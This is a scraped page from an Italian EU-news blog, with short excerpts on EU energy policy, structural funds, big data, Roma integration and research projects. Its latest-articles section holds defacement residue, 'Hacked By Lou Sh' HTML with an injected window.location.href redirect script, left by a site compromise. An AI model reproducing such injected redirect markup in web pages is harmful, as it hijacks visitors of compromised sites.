EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Attualità europea

it

Completare il mercato energetico europeo è la soluzione più efficace per garantire un approvvigionamento conveniente agli Stati UE e limitare i danni dei cambiamenti climatici. Se si ottimizza il mercato interno energetico si potrà avere un beneficio economico che va dai 16 ai 40 miliardi di euro ogni anno.

A dichiararlo è la Commissione europea nella comunicazione sulle sfide da portare a termine per dare piena attuazione al progetto del mercato unico europeo per l’energia.

Fino ad ora sono stati compiuti molti passi avanti in questo settore, ma per poter avere maggiori benefici a livello (...)

it

A distanza di due mesi dall’accordo di partenariato tra la Commissione europea e la Francia per definire la migliore strategia per l’utilizzo dei fondi europei, lo scorso 10 ottobre la Commissione europea ha approvato il programma operativo francese per l’attuazione del Fondo sociale europeo (FSE) nella Francia continentale per il periodo 2014-2020.

Il fondo sociale europeo (FSE) ha un ruolo decisivo nel supportare gli investimenti degli Stati membri per ciò che riguarda il capitale umano e aiuta a sostenere la competizione economica europea. Assiste ogni anno 15 milioni di persone per sostenerle nelle loro competenze, per aiutarle ad (...)

it

L’accordo stretto lo scorso 13 ottobre tra la Commissione e l’industria europea dei dati prevede un investimento di 2,5 miliardi di euro destinati alla gestione dei big data. In questo modo l’Europa potrà portarsi al pari degli altri Stati a livello mondiale. L’intesa sarà attiva a partire dal 1° gennaio 2015.

Investire nei megadati porterebbe alla creazione di circa 100.000 nuovi posti di lavoro entro il 2020 e potrebbe ridurre del 10% i consumi energetici in Europa, sviluppare l’assistenza sanitaria e avere a disposizione macchinari industriali più efficienti.

L’intesa in materia di megadati è (...)

it

Lo scorso 2 e 3 ottobre si sono riuniti a Bruxelles i sindaci di alcune città di Belgio, Bulgaria, Grecia, Italia, Portogallo, Romania, Slovacchia, Ungheria e ex Repubblica iugoslava di Macedonia per constatare se sono avvenuti dei miglioramenti nell’integrazione dei Rom su base locale, attraverso il programma Romact nato dalla collaborazione tra la Commissione europea e il Consiglio d’Europa.

L’obiettivo della riunione è stato di evidenziare le buone pratiche e i progetti concreti messi in atto dai comuni per favorire l’integrazione tra Rom e popolazione locale. Diversi i progetti portati ad esempio. A Napoli il comune ha predisposto delle pompe per l’acqua all’ingresso di ogni campo (...)

it

Forse pochi lo sanno, ma le alghe possono essere una ricchezza fondamentale per la produzione di alimenti ed ingredienti per mangimi, per prodotti biochimici e biocarburanti. La difficoltà maggiore però è quella di poterle raccogliere con un buon sistema e in proporzioni notevoli. L’Ue ha allora finanziato il progetto AT SEA che ha potenziato tessuti nuovi che incrementano la produttività dell’alghicoltura galleggiante permettendo così di coltivare in maniera più facile e meccanica.

Il coordinatore del progetto AT SEA Bert Groenendaal, è convinto del fatto che coltivare le alghe marine su larga scala possa permettere di far nascere in Europa un nuovo settore che dia occupazione a molte persone e che generi da solo miliardi di euro. Oltre alle sette imprese partecipano al (...)

it

Lo scorso 8 e 9 settembre si è tenuto a Bruxelles il sesto forum sulla coesione per mettere in rilievo l’importanza di creare nuovi impieghi sia nelle regioni che nelle città europee e per accentuarne la crescita. Tutto questo per ridurre al minimo la discrepanza economica e sociale che si è venuta a creare nel corso del tempo tra le regioni europee, per incrementare la loro competizione e per raggiungere gli obiettivi a cui l’Europa vuole arrivare entro il 2020.

Il forum sulla coesione viene organizzato ogni tre anni e riunisce leader e politici di spicco che appartengono agli Stati membri dell’Ue al fine di valutare se gli obiettivi che ci si è prefissati di raggiungere siano stati effettivamente portati a termine. Il tema affrontato per il 2014 ha (...)

it

Ogni 60 secondi il mondo genera una quantità di dati pari a 1,7 milioni di miliardi di byte, quantità che potrebbe essere ospitata in "appena" 360.000 DVD. La domanda che allora ci si pone è come il nostro cervello possa coordinare quest’enorme mole di dati (dataset) che vanno di giorno in giorno ad espandersi?

I ricercatori del Collective Experience of Empathic Data Systems stanno mettendo a punto un ingegnoso sistema interattivo che si propone di adattare la presentazione delle informazioni al nostro cervello a seconda delle reazioni del nostro corpo in modo da evitare un elevato sovraccarico per (...)

it

Per l’Ue la sicurezza durante il tragitto in mare è un aspetto fondamentale per poter salvaguardare i cittadini europei. Con il sostegno europeo per la ricerca, ogni qualvolta si avrà la necessità ed il bisogno di evacuare i mezzi marittimi lo si potrà fare in maniera più efficiente e sicura. Nella ricerca finanziata dall’Ue sono inoltre compresi dei progetti per rendere più stabili le navi da crociera e i traghetti.

Il progetto per rendere più efficiente i mezzi marittimi ha il nome di Lynceus e terminerà all’inizio del 2015. L’Ue ha speso 2,5 milioni di euro per portarlo avanti e coinvolge 15 partecipanti che provengono da Cipro, Germania, Grecia, Italia, Spagna, Svizzera e Regno Unito. Esso consente di (...)

it

Pubblicata dalla Commissione europea la relazione annuale relativa alle frodi al bilancio UE: necessario da parte degli Stati membri un impegno maggiore per ciò che riguarda la lotta alle frodi. All’interno della relazione sono contenuti alcuni elementi importanti sui quali gli Stati membri dovrebbero porre maggiore attenzione. Secondo la Commissione, occorre un maggiore impegno a livello nazionale per mettere in rilievo e combattere le frodi al bilancio dell'UE.

Il primo passo è sicuramente quello di analizzare i dati risultanti dai controlli effettuati: un atteggiamento che già molti paesi hanno preso in considerazione e che porteranno avanti negli anni a venire. Attraverso i dati è possibile capire l’impatto che le frodi hanno sui fondi e i bilanci (...)

it

Lo scorso 26 giugno il Commissario europeo per lo sviluppo, Andris Pielbags, ha annunciato il rinnovato impegno dell’Unione europea in materia di istruzione. Infatti, per il periodo 2014- 2020, verranno destinati 4.5 miliardi di euro ai paesi in difficoltà che il Partenariato Globale per l’Educazione (GPE) aiuta. I fondi serviranno per finanziare l’istruzione e per garantire un processo di crescita economica e umana a realtà sottosviluppate.

L’annuncio dei finanziamenti è avvenuto durante la Conferenza del Partenariato Globale per l’Educazione, tenutasi a Bruxelles alla presenza di oltre 40 ministri dell’istruzione provenienti dai paesi in via di sviluppo e del direttore generale dell’Unesco, Irina Bokova. Non sono mancati, inoltre, (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France